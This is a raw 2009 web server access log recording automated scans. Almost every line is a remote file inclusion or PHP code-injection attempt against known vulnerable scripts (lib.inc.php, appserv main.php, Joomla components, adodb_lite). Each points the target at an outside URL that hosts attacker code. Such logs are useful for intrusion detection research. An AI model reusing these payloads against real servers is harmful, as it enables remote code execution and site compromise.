195.137.160.91 - - [17/Apr/2009:13:00:53 -0500] "GET /logs/access_log.1233014400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.look22.de/slideshow/javascript/i6.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
60.251.60.100 - - [17/Apr/2009:13:08:34 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:13:08:34 -0500] "GET /include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:13:08:34 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
60.251.60.100 - - [17/Apr/2009:13:09:06 -0500] "GET /logs/access_log.1233878400/include/lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:13:09:34 -0500] "GET /logs/access_log.1235520000/errors.php?error=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:13:09:34 -0500] "GET /errors.php?error=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:13:09:34 -0500] "GET /logs/errors.php?error=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.45.58.138 - - [17/Apr/2009:13:10:25 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voodoo-people.net/cache/chid?%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.816"
216.45.58.138 - - [17/Apr/2009:13:10:30 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voodoo-people.net/cache/chid?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.816"
208.64.202.134 - - [17/Apr/2009:13:13:08 -0500] "GET /logs/access_log.1235520000/errors.php?error=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:13:13:08 -0500] "GET /errors.php?error=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:13:13:08 -0500] "GET /logs/errors.php?error=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
216.45.58.138 - - [17/Apr/2009:13:15:47 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://voodoo-people.net/cache/chid?%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.816"
216.45.58.138 - - [17/Apr/2009:13:15:47 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://voodoo-people.net/cache/chid?%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.816"
193.254.202.25 - - [17/Apr/2009:13:15:55 -0500] "GET /appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
193.254.202.25 - - [17/Apr/2009:13:15:55 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
193.254.202.25 - - [17/Apr/2009:13:15:55 -0500] "GET /logs/access_log.1231200000/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
193.254.202.25 - - [17/Apr/2009:13:16:08 -0500] "GET /logs/access_log.1226707200/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:13:19:11 -0500] "GET /logs/access_log.1237680000/errors.php?error=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
200.93.147.154 - - [17/Apr/2009:13:20:08 -0500] "GET /logs/access_log.1237680000/errors.php?error=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.93.147.154 - - [17/Apr/2009:13:20:08 -0500] "GET /errors.php?error=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.93.147.154 - - [17/Apr/2009:13:20:08 -0500] "GET /logs/errors.php?error=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.93.147.154 - - [17/Apr/2009:13:20:33 -0500] "GET /logs/access_log.1235520000/errors.php?error=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.249.190.60 - - [17/Apr/2009:13:21:02 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
72.249.190.60 - - [17/Apr/2009:13:21:02 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.249.190.60 - - [17/Apr/2009:13:21:02 -0500] "GET /logs/access_log.1238803200/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.249.190.60 - - [17/Apr/2009:13:21:02 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
72.249.190.60 - - [17/Apr/2009:13:21:06 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
72.249.190.60 - - [17/Apr/2009:13:21:06 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
72.249.190.60 - - [17/Apr/2009:13:21:06 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.249.190.60 - - [17/Apr/2009:13:21:16 -0500] "GET /logs/access_log.1238803200/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
85.17.108.215 - - [17/Apr/2009:13:21:36 -0500] "GET /appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.17.108.215 - - [17/Apr/2009:13:21:36 -0500] "GET /logs/access_log.1231200000/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.17.108.215 - - [17/Apr/2009:13:21:36 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:13:22:05 -0500] "GET /logs/access_log.1237680000/errors.php?error=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
85.17.108.215 - - [17/Apr/2009:13:22:16 -0500] "GET /logs/access_log.1226707200/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.17.108.215 - - [17/Apr/2009:13:27:24 -0500] "GET /logs/appserv/main.php?appserv_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:13:27:24 -0500] "GET /appserv/main.php?appserv_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:13:27:57 -0500] "GET /logs/appserv/main.php?appserv_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:13:27:58 -0500] "GET /appserv/main.php?appserv_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
217.147.29.190 - - [17/Apr/2009:13:30:53 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.147.29.190 - - [17/Apr/2009:13:30:53 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
217.147.29.190 - - [17/Apr/2009:13:30:53 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.147.29.190 - - [17/Apr/2009:13:31:39 -0500] "GET /logs/access_log.1238803200/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.175.71.121 - - [17/Apr/2009:13:31:46 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
81.175.71.121 - - [17/Apr/2009:13:31:46 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.175.71.121 - - [17/Apr/2009:13:31:46 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.175.71.121 - - [17/Apr/2009:13:32:18 -0500] "GET /logs/access_log.1238803200/e404.php?DOCUMENT_ROOT=http://www.imprex.co.kr/bbs//skin/happycast_blue/aJ.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:39:15 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:39:15 -0500] "GET /logs/access_log.1230163200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:39:15 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:39:17 -0500] "GET /logs/access_log.1235174400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:42:18 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:42:18 -0500] "GET /appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:42:18 -0500] "GET /logs/access_log.1231200000/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:43:02 -0500] "GET /logs/access_log.1226707200/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
195.34.78.110 - - [17/Apr/2009:13:43:28 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.smtsite.com/blog2/users/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
195.34.78.110 - - [17/Apr/2009:13:43:29 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.smtsite.com/blog2/users/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
218.185.20.88 - - [17/Apr/2009:13:48:22 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://ragas.baarleweb.net/files/data/v5id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:13:48:22 -0500] "GET //include/admin.lib.inc.php?site_path=http://ragas.baarleweb.net/files/data/v5id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
83.138.144.89 - - [17/Apr/2009:13:48:49 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:13:48:49 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:13:48:49 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:13:48:57 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:13:50:03 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:13:50:03 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:13:50:03 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:13:50:12 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:13:51:00 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:13:51:00 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:13:51:00 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:13:51:04 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:13:51:04 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:13:51:04 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:13:51:08 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:13:51:11 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
202.53.227.32 - - [17/Apr/2009:13:53:10 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:53:10 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:53:10 -0500] "GET /logs/access_log.1230163200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:53:10 -0500] "GET /logs/access_log.1235174400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
85.17.108.215 - - [17/Apr/2009:13:56:48 -0500] "GET /logs/errors.php?error=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:13:56:49 -0500] "GET /errors.php?error=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:13:56:49 -0500] "GET /logs/errors.php?error=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:13:56:49 -0500] "GET /errors.php?error=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
65.55.208.143 - - [17/Apr/2009:13:58:23 -0500] "GET /logs/access_log.1237507200 HTTP/1.1" 200 256041 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.17.10.239 - - [17/Apr/2009:13:58:25 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://ineedotogetlaid.freehostia.com/priv8/ids/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:58:32 -0500] "GET /appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:58:32 -0500] "GET /logs/access_log.1231200000/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
202.53.227.32 - - [17/Apr/2009:13:58:32 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.17.10.239 - - [17/Apr/2009:13:58:35 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://ineedotogetlaid.freehostia.com/priv8/ids/fx29id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
85.17.10.239 - - [17/Apr/2009:13:58:35 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://ineedotogetlaid.freehostia.com/priv8/ids/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.17.10.239 - - [17/Apr/2009:13:58:59 -0500] "GET /logs/access_log.1235001600/includes/ktedit/toolbar.php?dirDepth=http://ineedotogetlaid.freehostia.com/priv8/ids/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.55.208.143 - - [17/Apr/2009:14:00:02 -0500] "GET /logs/access_log.1238976000 HTTP/1.1" 200 358870 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [17/Apr/2009:14:00:08 -0500] "GET //errors.php?error=http://www.movie-net.tv//top/z1??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
219.85.63.226 - - [17/Apr/2009:14:00:11 -0500] "GET //errors.php?error=http://www.movie-net.tv//top/z1??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
219.85.63.226 - - [17/Apr/2009:14:00:14 -0500] "GET /logs//errors.php?error=http://www.movie-net.tv//top/z1??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
219.85.63.226 - - [17/Apr/2009:14:00:14 -0500] "GET /logs/access_log.1237248000//errors.php?error=http://www.movie-net.tv//top/z1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
219.85.63.226 - - [17/Apr/2009:14:00:16 -0500] "GET /logs//errors.php?error=http://www.movie-net.tv//top/z1??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
219.85.63.226 - - [17/Apr/2009:14:00:16 -0500] "GET /logs/access_log.1237248000//errors.php?error=http://www.movie-net.tv//top/z1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.208.144 - - [17/Apr/2009:14:01:28 -0500] "GET /logs/access_log.1237939200 HTTP/1.1" 200 335496 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.23.122.131 - - [17/Apr/2009:14:08:03 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.23.122.131 - - [17/Apr/2009:14:08:03 -0500] "GET //include/lib.inc.php?site_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
209.23.122.131 - - [17/Apr/2009:14:08:03 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.23.122.131 - - [17/Apr/2009:14:08:21 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
82.141.129.7 - - [17/Apr/2009:14:09:31 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:14:09:31 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
208.110.64.10 - - [17/Apr/2009:14:13:49 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
208.110.64.10 - - [17/Apr/2009:14:13:49 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
69.73.160.219 - - [17/Apr/2009:14:13:54 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
69.73.160.219 - - [17/Apr/2009:14:13:54 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
195.5.163.212 - - [17/Apr/2009:14:15:25 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
195.5.163.212 - - [17/Apr/2009:14:15:26 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
69.73.160.219 - - [17/Apr/2009:14:18:05 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
69.73.160.219 - - [17/Apr/2009:14:18:06 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
195.5.163.212 - - [17/Apr/2009:14:18:11 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
195.5.163.212 - - [17/Apr/2009:14:18:11 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
208.110.64.10 - - [17/Apr/2009:14:18:57 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
208.110.64.10 - - [17/Apr/2009:14:18:57 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.teampoint-koeln.de/media/cek.jpg?? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
200.43.77.59 - - [17/Apr/2009:14:19:34 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
